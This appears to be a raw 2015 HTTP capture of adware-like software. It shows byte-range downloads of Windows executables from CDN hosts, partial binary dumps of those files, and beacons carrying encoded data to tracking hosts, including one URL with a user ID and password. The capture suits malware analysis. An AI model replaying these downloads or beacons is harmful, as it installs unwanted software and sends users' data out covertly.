.`...c#....V.... .`..[eB...1Q.b.....w..b....,.dr.Fg..w.b[.....4(.e,6n.
]..y...VWA....e.(T....e.P."cm..[......~G...l....h.f|..[[.m..8....%\K{a
H...6...Ls,....h.2h..p..aHR.K.b..DHu^.u.....W.b/k..l....'2.4M)M.Nhq..L
.-...e..^d...e.2..j`..B...%X1..6.-X.....[...b.. ....a....Q.w..P.....6.
..eaG.Llb0Q.;.f....h!Z...AE........._..j.4.Y...hQ......)..H..B..K=....
..........$}O.[.......P^.p.6....G.T&.9...mw.j...F!..'O........K...M.?.
....J..y....c"......@j4_x.#.......&.....8.n......r=..$_..)?e.u.OB.'...
.V.r.....Z,[email protected].'.."I...S[.........
...%e.........xo/[email protected]\..1.-..vAz...UQ.V.[L....
. qEQ.,.._ET/1..#.wX.-.1..(./.#.c....G..chR....%..X.]........q....]N.F
.Q...\Y..Q.I...[..o_..0..,x*.-y].t2...FB0....c..f.i.....w29..;:-.....u
.......zXKM.].?.........3Fsll|.l.q...7.'..m.......B[....a......:..
<<< skipped >>>


GET /mirror/nerocrossrider/appshat_generic.exe HTTP/1.1
Range: bytes=0-
User-Agent: Better Installer(Mozilla)
Host: d3hm9b8fv0d908.cloudfront.net
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 285558
Connection: keep-alive
Date: Sun, 12 Apr 2015 05:05:02 GMT
x-amz-version-id: zdbgB_7owwl7Hq6LIKQBG0yBaPWISKtC
x-amz-meta-s3cmd-attrs: uid:500/gname:www/uname:www/gid:500/mode:33204/mtime:1415096893/atime:1415097003/ctime:1415096894
Cache-Control: max-age=3600
Last-Modified: Tue, 04 Nov 2014 11:01:28 GMT
ETag: "518879abe3170dabd172dfffcd165598"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 0-285557/285558
Age: 3017
X-Cache: Hit from cloudfront
Via: 1.1 f05da132bcca9514452d39f83b3544d2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: LgdBttjjMo7J5XbTQVoyM-7tKJ8x083ZhCxmykQRk2CSmHuPFuUBgA==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
......@...............................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
[email protected]..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>


GET /ajax/libs/jqueryui/1.10.3/jquery-ui.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: ajax.googleapis.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Tue, 07 May 2013 09:09:49 GMT
Date: Thu, 16 Apr 2015 23:35:47 GMT
Expires: Fri, 15 Apr 2016 23:35:47 GMT
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 60666
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 172852
Alternate-Protocol: 80:quic,p=1
............kw...0.}...$.0.)r&.&.!..x..Y..{.N....!["..`.p......K......
......{WwWWU......_..N4.N.......l2.N..............=9Yw.6;?.......,.[H.
.Znv .f'.1..FL...V..ru#:/....~.US...o6..z...7.-..Ho.F,.PF.....5....%Le
U.....j..v#:..7...._.........(.M}.......V.Y..Z.g0^n.m8.A......z5..u1.S
o....o.....P...m...:..........oCY.rh.]ST.u.....yI..-..ro....Y.....^{..
..z...Z?..7........C. .S.......{`L'E.:...hN.u.5%...i/N.*..j..../_.<
9....6....T$w....EZ&wo...J..H.\L*X.o.[.c..~'..E ..........E..y3. (....
....u^M*.......gg..Yt[l.t5..<....... 8.P8.E4.G."J......8;k."I..Y...
e..u{>..N..p8{>`..._!.|.....d~*.0.x.WY$..c....L.i..44....y.M..4.
.r.....-.....gg.....o.dR.V.(..._\..[.....JT8.n.l..[.m.Q....>D.!.lDu
........y..]9.W..V._._t.=r.g..;.8.NT..S...0H.1..OG..........._....=..2
.].....~..~....._.|.2..o.......7...7.e.>.?.^~..../.x.......O.......
.._...U....o...w.?{......T.~...._?.*...:........2S)....T........}.gH..
J....x..... ...w....k..........=K.{......~?M...?....>.i>{..z....
)........ ....z.k3.Df.uR..z........u....>)..t.Q,..2......Z..*oE....
.e..8I[.x..h..}p..I&&.v.....hnv.....!..SM..l...;.y...<.8.D$.8;;....
.r....} .y8h...#...$.......]'..c...?...c..^5........u...q.x..y...5l..M
..JF........>.4..x.d.....h.s.......Hb.. ...I`....|Y..{.%....qy.."Q.
M7..#.x.P......nb.Km..A...4.\....t..fU...Q...h.8R..h...#...7M.>`..2
..h..U...8.t..9-.o.o...N..*Q...j...1N.2uzHwU........'.3L..j....<b..
.NF..V..6..V...l....\...w2...w].W../.FW....t.e.".........K....b......(
zSI...R.. <..[[email protected])pj"...)y1a.....W..]...
<<< skipped >>>


GET /v4/searchprotect/267123711_198339_B48A115F?action0=xa.geoip&action1=visit&action2=install HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sat, 18 Apr 2015 23:36:35 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.56 ms","message":"store 4 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Sat, 18 Apr 201
5 23:36:35 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encod
ing: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-
version: v4..48..{"stats":"ok","time":"1.56 ms","message":"store 4 act
ion and 0 update "}..0..



GET /app/ping.ashx?e=2v0SNuZrMFyw0RTUGALXSri3muUffR3jCQhr67P8VPFdOfUh X e3BUkrLg5U13m1q9vWxoWV9 zo7anpTgKufSzmM3HEufAEaBiShDKRIV XTIrvDDxtKzNSYNJd9iFfUP3zrweiciP01Y5blnUF9RCwvFUhC5HFk/V3QGvA4nPCU8GQVxGgK2dgS8O/TaQhbdsE06OTTBOUDdMBQAxomYsAOzz7hm2v6mMnRFV9GixawDbyZHa2BnoeadAD6fPeMf9TfgZ9Z/Hbpte9Qm WpuhwwxJ7NKL3Uy0disUqxnYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW fxWwjEc sn2rSyXRG2F38ORoUV4ogQDN0 5Fc7QwHLSVArsosbOUjUCKiRklP9YGqUs1rjapz18LnSy9mQHKSkUbHW6V7MJAtE He3GIrx8 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
Host: rep.youtubeaccelerator.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:44 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Content-Type: image/gif..Serv
er: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.
NET..Date: Sat, 18 Apr 2015 23:35:44 GMT..Content-Length: 0....
..


GET /app/ping.ashx?e=/k6kR j50trrVVBzJuBn8v3K4Um6afGyBlfbAaYx2ELdEMPgzYwqeWQ14on7GBy10Z2od4/JytiUTOMPdFXY/7OjtqelOAq59LOYzccS58ARoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkcWT9XdAa8Dic8JTwZBXEaArZ2BLw79NpCFt2wTTo5NME5QN0wFADGiZiwA7PPuGba/qYydEVX0aLFrANvJkdrYGeh5p0APp894x/1N Bn1n8dum171Cb5am6HDDEns0ovdTLR2KxSrGdjP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb5/FbCMRz6yfatLJdEbYXfw5GhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKRRsdbpXswkChr98/SR9nrM= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
Host: rep.youtubeaccelerator.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:45 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Content-Type: image/gif..Serv
er: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.
NET..Date: Sat, 18 Apr 2015 23:35:45 GMT..Content-Length: 0....
..


GET /app/ping.ashx?e=xBG2NTmY QK9KEnyTrgYNCS12lnL SoR3Pumfblmu5B9EKWfiY9Pr9w9nGpQKxy70q Jjl2n6lTqMDSi8JPnXntmD8Dkx2dtxTFIShqYYGTBXl5O1yvgpvbs4KoC9rXoM04b/1V7BRVJIg//0i5Y0yFFDT8zaqXUPiEHC8qKnK0y29LnfOuhHRfPsjAwYrz0BON6bpifNP90ZOR3qDKzNEkiM1XqVHspN5k/xV0ou3jDB1OlY/J/1le8QB0l0RjKYiTJiFZhVM8MhwydMkRQ2QcxqMFWusbg17u1zDN5hWKM8MU7L6Z1XFzslN/Oom5DbE2hSZV1srvsrduYhMMj26C9PLeYwYaPTl2pfP1 VeNlvtdc20PV5GDlNcv2CDURj6Fy3X7tYh7DeGRS0pnnebdYnK0cLSUmH4Gg7nL31GCT2C22Pl6OkW3dyPfVSTAJ HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
Host: rep.youtubeaccelerator.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:54 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Content-Type: image/gif..Serv
er: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.
NET..Date: Sat, 18 Apr 2015 23:35:54 GMT..Content-Length: 0..



GET /online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=e59a543c-07c1-4575-b0a1-b17d7cfac7a7&Password=l6G2E4Yn&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400137&SBPIDS=1&KA=1 HTTP/1.1
User-Agent: CoreWinInet
Host: online.speedbit.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ounjmtawx5z3mav20cahyjnt


HTTP/1.1 200 OK
Connection: close
Date: Sat, 18 Apr 2015 23:35:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, no-store
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44
<RESULT>.<LASTERROR>0</LASTERROR>.</RESULT>...



GET /app/ping.ashx?e=yhrBLBbZM9WBOuidoZFbtbi3muUffR3jbLi6w5qijh6RoZJTpqsyZxASc9FSZWyoGYsEX4kIHlu/0mFZouDnPiqbL3WeaiLbzTMGWLRHpW9oALKR6u0dIX8SRNladdM9bXKriifhG9zxHHFV7tnwhkh7wLZ3uox395lwett3Vo8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlFdklJzkcUqd3Ih1Kfu IMReuT yH/uLbphiW/DYdUZuL1XwldYyi6o6OPzltHHEh4SKAFSm7JN4Dvl1Ie0NYsXYWYJZ2G1R01VmUCJgsNE AYCsljvoJNwjLw3VULpGjCmtL90K5JhMVO wnJbdjPvjIThxN S9EwTxchauHrQ9hdXWs9gHCsWrLZx3iqhAOXSh4  HSf3cXZ8qiEfUAdAvtCk0QnWPYVQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykpbY7 yLWB4 IfJKZ4NCKSCQ== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:37 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBq2mie6K97bhs4164GCUCrHY6 CMJNDnNYID5x5YtLWQpafL9ybUqF lhUgcG7ZBvd4qRXJPYOz 4i7hnHdhdcduQ/fd4pcRUO5yQynRUZI5Y08jY48xBJrw5bx1Bs6wXxOai4hHWpZ05BUTAhZFkj0WbcKfDrpl0bZGFcQYWFKUSuSWw6fC38LH/jy8G4FGJY4SiD403Los HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:37 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=yhrBLBbZM9WBOuidoZFbtbi3muUffR3jbLi6w5qijh6RoZJTpqsyZxASc9FSZWyoGYsEX4kIHlu/0mFZouDnPiqbL3WeaiLbzTMGWLRHpW9oALKR6u0dIfc/boITtVwp1P9gDFCZ6VapvGDt BB/ci1dbz JN6x9xuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJegMBsN/V/kj ukMkugzkCYw3hkUtKZ53m3WJytHC0lJh BoO5y99Rgk9gttj5ejpEBSr28YVyfPg8SfsOq8sVv HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:37 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBpQ6ZdlmdsYCbUPmaXNWlX6cOBv59w3XV3YMennWKpognh1HGq AP1KrMrg41l/Ly7CST5Ycto3cE6nMAQ0x67lxVrNxtz1yEbBRuaRLHbXnTUEr/6e1TisbrbAZflc27 ln nOmsXLiGMaGZpy/Ub67iSCXfI0 nk7xKwR3W9AY9/CpuCTIAF0= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=s5Ydxb c7o0asVMAMALcPL0oSfJOuBg0J7P3DAC8IMDZhN5o5pkk8XKxIhAz9YyqMSx1JGlNOutOeXK1HgKvEMUWbVgwixNWcSwZ6/LEwZLppMdrwPpmw3scS/rum0dyUP gGlRflyueXXE4oNm6FfjcbTVOKlb2t5UU9B7DBN2oXYru/dbHg/eJIUUI29KJua/YhbaaQtbhLKDJ7gHH44roFtpr/bY5GbVYBUSgIm940bIUeotQDrkRgG1RponZW17SH9ileexTK6LFIjgpsLAf6b7pWvtYj3YOinLgXsemrvcVl0Mf/w== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:38 GMT..Content-Length: 0..



GET /yta33_full.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 0-249999/7590800
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......5..Yq...q...
q...q...~.......t.......p.......p.......p...Richq...........PE..L.....
.7......................s.............. ....@.........................
..s......st..............................!..5...D ..<....@..,.s....
.......s..............................................................
 ..D............................text............................... ..
`.rdata....... ......................@[email protected]...............
[email protected][email protected].................@..@...................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....x...SV.....W......
V3.PS..4 @.......VP......P..0 @..=, @.SSj.Sj.......h....P......E...{..
.......PV..( @[email protected]..$ @[email protected]
.../...SSSj.S.u.... @.SSSj.P.E.... @....E......G.....MZ..t...MZ..u..x.
.t..E.@.}.....|..M.SQh....P.u.... @.W... @..u..=. @....u...... @.j..E.
Y3..}.V.........E.D...P......P..0 @..u.......".......F...:.t..."t.@...
8"[email protected] [email protected]..< @.....E.P.E.PSSSSS...
...SP......P... @...t.j..u.... @.......P..  @._^3.[....:.t... t..H
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 500000-749999/7590800
....a....(S...q........a...!.O..7\[email protected]....'.t.i.C..1%.... ..U$f.:n
.Z..a.kw4w`..0...&.F..^..$.FN..0..R.l....gY,4Q..=...&............k.i\.
}Q/..v.~..$W...../....JZ.)..#&....F.....D.. d..^D..QA.*.!&...1.jW..]#3
..A...#A.x.v....#8.....R..x c".A..vr..r....[.....>..^...Y..........
......mx....d ..o....k.d....x..w.....O.6...Q.......Od...6..a.o...<.
A....b....ds!..y=....Na..L..ZR.@[email protected]"..
..........K0.....T....1.3.....J/l....'[email protected]...?...Z...c..OJ...)R.
?S...u..s_Y.[..r.....3.#.....O...'[email protected]../vE.c... .......D..
.6G5..7H..........&.g.f ...n. ..3....L...V.~1..g.).(.......BA.}..s....
wL.Vr..x7..8.....H...o..%...(.........-C.....z.P.."........2.I.(...t..
n..V.2Q..M...Yf!u..=].7....][email protected]..* 
.....b7..... ......8bD....uA..-lN.BHu0`!q_B*.{.$.eq<.V.w...]...V_x.
[email protected]..]..s..%.[....r.....Ge,F.....U=|.]...k....I.....DU...fZ}.nMp.r..
.5.s!..8......s?..:..K.{........,.h.0....,....q8...9.=.......w$U.qe...
...$..G*.j.....'".....9.;;..h.#Rt]#*(...8/DV.pvP...;..,....W..e.....pD
K.....wp...O.^...(4....sk.Q..:..|....Jv.......(..&._.U.l#[email protected]\.P
}U.5c.L.........h.o5pt...,...p........-}...<.B-$....}..H..8d....G..
.L.4.d.Y.3.wrD..$L.....{qQ.....<..."._...O-zV .U.E:N1h.^>.U..0.B
!.}.e~.b............Z./b.~9...w.....dI....6d.\m.....2^.G...t.Ci...~..v
.....1......`...|....!.....S"gR.Z.jhp.q...5....&.n....^f..<xg......
..s.&.....-#....3F.q#.*..Eo. .2......R......,......."...2.mE...A].....
....x..VU...%.QY8Z.2.....O..5`..'..MnA..B.>v...F......dP....\?r
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=1000000-1249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1000000-1249999/7590800
.'...:V....:/.s..im...7....W......8..r.1..}]6>9g........Q....`.....
-...c.So..Lm...9.....!...E.j!...3.\3.C.f.a.....C.#[email protected].... a
.....J;....u...*.......~.N..B........X.0.Z....).....4.O$..A~..ArG..X\.
...B.r.....8..G..@\.[.....d:[email protected].[...N.K.L.%l.]|...C....V.EhI.
Y...O..c....|q..._Y.m....rK....Z.on.y.s....v...y.f'.E....R.RO$f[......
...{t-5......>.......).m...S^.H......9..-...#..*h.g.X.1...O.~.?._..
2g_.....9.../......b 6/.6.-.6...(..V.. l26..W..<I.:.....&`M..<..
h.......).=@TEo.~...4.. ..`...!8...........7......=......Ui.!..;....).
...9.....&.@<..e....[_:..XV..UTC2....A..E.l.V.q.*Jyng.....Jv.m&....
....}.E1..c,00..~<.1..uE..B..E.Vs.O.....C..M&....[..EjQU^....../.b.
/.....a./....3........e..z....*.6&,..5..?.[JI...pQi)8...oC.."......tU.
..V_Ce..5u.Zza.(..m......\.......*......Q..Y..>.G.7.5..b.w..T(&...8
 \pwV.F,.8.<....V...*..,...}]......'...)..\..;...z#6..w_....9.^G..p
.0#..98..._Z...,.5....{..n.....Ma..$..V...'Wg..> Ci..h............`
.!....=......H...J...4. {...........U.....S^uC..E_.....?nN...s]...D..|
./?iY.......X..2^..[.....FS3..OL.8N......K'...Uy..1j/-...)%7.S...H..V.
.F .^.V..aP...4...u .:Z.q.9...1w......9s...6... XA..5V...8...`...1G..:
......~.w..n.........Z..2..Sj..-...|cp.....]7...2....o...?..) y0.p..8.
w..Ad..r..j...T2K)>()...-..hk..M....4...6?..W..CzZ...}[email protected]
...}..Y\......N.....A.=Y"q./. .....jy1F..&s t^,./....V&..L.u.L:U...ne&
lt;@1...GqN;.$QK.i..w.).3.,..3.....*...v ......uT..c;.y..7............
._"k...D.E..........O.....R_.u=.t.'.....W.h.?y...Jj...0.M........o
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:18 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1500000-1749999/7590800
e.B$./..e...........Y......,.. ..Y........mP..R..b...L....Y 4.f.E&..A.
.|.*....^.;..S...&<<H'.q\[email protected]... .q.~._...
..s..4;. `\.....7H..zG.Z..]}.......4.._.....s..>`E.o....7..A..@....
6.... *..2...1. 4..C.o.......4...x.........@0iT..%)`%..y..f~........E.
..]hB...:..W...r...o.M$....S............X..... =............\@...t._..
.?......S..jc...U..,.. ~jY..IR.s....n...s...!..1..~.[....D..Dh...9..\.
L8.~c............O...h...:.W....../...YT.]W!.A1h"...F.......'....c....
 .,@>....4...D..]...s..t....1......A...<.A).w..t.&c..M.R2....&x.
...F..,{.t..r.5.<5....B.l.......y.iiF.....O..O..-Q"..m?k....l....tJ
.Vu..,Z.T...k.{...g.V8....."t].$...R...!...W...l.m....r.....g..|6.{.W.
}.W[.jV#.v.m.aa.QO_.M.m...fbK....9...r'..jaO.V.b..MF.:g.1]t.|..).y...C
.....2....xa1.e.d~.q.L........=.s..>v.^.&@:.i.Nz.#.t.....-%..kt...E
.$.......?5..&......5...H.M.5.P. .n{...!AX.~..^^i...*......zV....h.L..
.....k....G...EU.....:rq&.$.BIF^.B;(.x.%s./(Z...Dd'....(...v...&u...D.
EE.........uT..Pg9.. .)........N.....}?.q?...y..Y.Z....wY....v^|.f.\..
....$.s.....%.....5.w..%ooK.......%........w!.U..so;/.......sh[z..>
...jW..........q.{kW...z.....N.w}..5Ix3-}.0.v......z$}.4.v..L.6{?..=..
.....u..2x.K..?.I...[.......9..rs......mE.a.s.....K..x..?D/....S..<
-_..:$S.(.&.d.IH..!.SB..k....W..~..n,....?.t_..C.p...~.........8...E..
. ........s.o..[&.H!....D=a..5......(..z....hw.....>N\.. =.6...K.P3
p...........tn..f.z.d....;...-...e..b_..)f7.2....O...{............>
\......5R.zkwM..F....K..'.~.Ku-.K.v...7E......H.[..w.b..ez.>\.(
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=2000000-2249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:18 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2000000-2249999/7590800
..0M.......!..I/*r...S..h......B{.{.F$.~l...q..O ....\.B_.. J......2..
../.H.e<6.=....s.i....Fp.Gi.....~..I..S......j...v..,\.K.>.Qz.].
......p.nyc...-...H.:.l3r .F4...e...7.MN.G..../P[......S...K....8...\4
#........a:~..0.".....w......s.%.0.j...S.I>.e.....%3>i...|.....9
....qd.......K...`i..j....I.S...N"r..e\b.7....;..xi.Q.....w,I.....3t..
Z...=&....k....A.w...,........c..9<[email protected]...)...
[email protected].....{#.s...!..2.<k...i..oI"C.....1T.\.T..>.>....Ey!...A.
;.}K.I_...#.........Q3........1p....7.I..u..............s....x..z.D..L
.U......7:.S...(...1.5C.P...;....V....h.M.......ey..{..../A..#k.7.#n.t
Xn;wAu=....).'<.R..:9...>...bWY...QL...or..{.jn.i.3........v..$'
......g..T..r/.W.........?...aXV-h..3.g..M|qe.........(.u...Wa...f[..o
.K.._.J.....,.\.n..n.Zn.>.N...7...3D...6'.VA.K..&.`%...$V..."g..%.p
....T....t.... ...D....y....K...mX...8..B..cvlJ.0.W..W.....xfX..8Sl|..
..Uu7.=.~. ...o...".[.i..........h.dA*g>...j....p1....jz.i.pulE..S.
u............;<.. n.uK.yv-.v.0..7Z...R....@..>....0..43._..K.;.f
. D.P.?RVW.G_.e........w......zB...\.T..A 4v.5....J..5c.D......7K.-...
